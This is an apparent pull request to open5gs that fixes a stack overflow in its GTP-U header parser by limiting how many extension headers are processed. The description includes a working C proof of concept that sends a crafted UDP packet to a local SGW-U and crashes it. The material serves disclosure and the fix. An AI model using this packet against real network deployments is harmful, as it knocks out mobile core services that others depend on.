### PR TITLE
[GTP-U] Fixed a stack overflow bug (#3003)

### DIFF
--- a/lib/gtp/util.c
+++ b/lib/gtp/util.c
@@ -65,7 +65,8 @@ int ogs_gtpu_parse_header(
          * then the value of the Next Extension Header Type shall be 0. */
 
         i = 0;
-        while (*(ext_h = (((uint8_t *)gtp_h) + len - 1))) {
+        while (*(ext_h = (((uint8_t *)gtp_h) + len - 1)) &&
+                i < OGS_GTP2_NUM_OF_EXTENSION_HEADER) {
         /*
          * The length of the Extension header shall be defined
          * in a variable length of 4 octets, i.e. m+1 = n*4 octets,
@@ -123,6 +124,11 @@ int ogs_gtpu_parse_header(
             }
 
             i++;
+        }
+
+        if (i >= OGS_GTP2_NUM_OF_EXTENSION_HEADER) {
+            ogs_error("The number of extension headers is limited to [%d]", i);
+            return -1;
         }
 
     } else if (gtp_h->flags & (OGS_GTPU_FLAGS_S|OGS_GTPU_FLAGS_PN)) {


### PR DESCRIPTION
Running the code below caused a stack overflow, so I fixed that issue.

1. Start open5gs-sgwud so the gtp server listens to 127.0.0.6:2152.
2. Compile the attached poc and execute it. It sends a crafted message to gtp server and causes abort.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdint.h>
uint8_t bytes[] = {0b00100100, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
                   0x01,       0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,};


int main() {
    int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("socket creation failed");
        exit(EXIT_FAILURE);
    }

    struct sockaddr_in servaddr;
    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(2152);
    servaddr.sin_addr.s_addr = inet_addr("127.0.0.6");

    ssize_t sendLen = sendto(sockfd, bytes, sizeof(bytes), 0, (const struct sockaddr *) &servaddr, sizeof(servaddr));
    if (sendLen < 0) {
        perror("sendto failed");
        exit(EXIT_FAILURE);
    } else {
        printf("Message sent successfully\n");
    }

    close(sockfd);
    return 0;
}
```